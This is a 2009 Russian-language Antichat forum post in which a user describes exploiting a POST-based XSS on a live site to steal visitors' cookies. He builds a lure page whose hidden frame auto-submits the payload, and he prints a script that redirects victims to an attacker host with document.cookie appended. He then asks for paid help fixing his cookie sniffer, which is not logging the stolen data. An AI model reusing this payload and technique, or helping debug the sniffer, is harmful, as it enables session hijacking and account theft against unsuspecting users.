ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости

Опции темы Поиск в этой теме Опции просмотра

XSS методом POST, неувязка
Старый 17.11.2009, 16:04
G4bR1eL
Познающий
Провел на форуме:
190034

По умолчанию XSS методом POST, неувязка

Приветствую всех пользователй форума Antichat. Тему создал из-за проблемы, возможно если она решится это поможет многим другим людям которые пытались использовать уязвимость этим методом, но у них были какие-либо проблемы.

Недавно я нашел xss уязвимость на неком сайте site.com. Осуществить эту уязвимость можно было методом POST, так как работало целевое поле
<form method="POST">
Тут код
</form>. Тобишь проводился инклуд кода, который нефильтровался и уязвимость на ура помогала вытаскивать кукисы (ну и до сих пор помогает разумеется). Мною был создан сайт на бесплатном хостинге, где была размещена страница-удочка, с framom, который незаметно для жертвы открывает нашу страницу site.com/index.php, вводит скрипт в нашу форму "POST" и подтверждает её. Значит клиентская часть выполняется успешно. В результате невидимо от пользователя frame выводит его (без его ведома) на http://evilhost.ru/s.php?login=Lolo
В фрейме выполняется код по нашей форме "POST" и его перекидывает по нашей ссылке собственно
'">
<script>document.location.href="http://evilhost/s.php?"+document.cookie;</script>'>

+document.cookie в данном случае = $QUERY_STRING

Кого заинтерисует данная тема и кто работал с xss методом post, я бы хотел что бы этот человек посмотрел мой сниффер и frame и сказал в чем ошибка, буду очень благодарен, возможно даже денег дам.

P.s. Использовал сниффер от куника + свой, просто не хочет видеть QUERY. Тобишь на мыло мне приходит подтверждение что XSS сработала, но без данных. А в логи сниффера также записываются IP и данные браузера, но опять же без QUERY.

Последний раз редактировалось G4bR1eL; 20.11.2009 в 20:42..